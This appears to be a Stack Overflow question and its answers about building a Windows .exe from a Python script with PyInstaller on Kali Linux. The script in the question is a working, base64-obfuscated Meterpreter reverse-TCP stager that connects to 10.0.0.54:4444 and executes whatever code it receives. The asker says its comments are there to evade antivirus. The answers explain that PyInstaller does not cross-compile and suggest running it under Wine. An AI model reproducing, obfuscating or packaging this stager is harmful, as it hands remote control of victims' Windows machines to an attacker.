# Compiling Python to .EXE instead of .ELF on Linux

Tags: python, linux, windows, pyinstaller

I am compiling a Python code on Kali Linux. I want to produce an .exe file to run on Windows. These are the following settings for PyInstaller:

```
pyinstaller -F /root/Desktop/Evil_private.py -i Evil_Private.exe
```

and the code is just meterpreter with some comments to avoid Anti-virus detection. The following code is:

```
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]
('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KI0kgYW0gbm90IGEgc2NyaXB0IGtpZGRpZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRyeToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm5lY3QoKCcxMC4wLjAuNTQnLDQ0NDQpKQ0KCQlicmVhaw0KCWV4Y2VwdDoNCgkJdGltZS5zbGVlcCg1KQ0KbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQ0KZD1zLnJlY3YobCkNCiNOaWNlIEFOVEktViBicm8sIFdIT0FBQUENCndoaWxlIGxlbihkKTxsOg0KCWQrPXMucmVjdihsLWxlbihkKSkNCmV4ZWMoZCx7J3MnOnN9KQ0K')))
```

When I compile it, I receive a .ELF file instead of .EXE. Maybe I could have the directory wrong? I do not think this is so, as I have checked most directories associated with PyInstaller. I have read the guide to PyInstaller, but it seems to be of no use. Is there any solution to compile Python code on Linux to get a .exe file for Windows?

Comment: Possible duplicate of [How to create OS X app with Python on Windows](https://stackoverflow.com/questions/34772216/how-to-create-os-x-app-with-python-on-windows)

Answer (score 2, accepted):

From [the documentation](https://pyinstaller.readthedocs.io/en/stable/operating-mode.html):

> The output of *PyInstaller* is specific to the active operating system and the active version of Python. This means that to prepare a distribution for:
>
> - a different OS
> - a different version of Python
> - a 32-bit or 64-bit OS
>
> you run *PyInstaller* on that OS, under that version of Python. The Python interpreter that executes *PyInstaller* is part of the bundle, and it is specific to the OS and the word size.

You cannot generate a .exe under Kali running its Python.

Answer (score 1):

Ignacio's answer is correct. The Linux version of pyinstaller will not build Windows PEs.

A [convoluted] workaround is install wine, then install python on wine (and pyinstaller on wine).

Then run wine's pyinstaller to build the exe.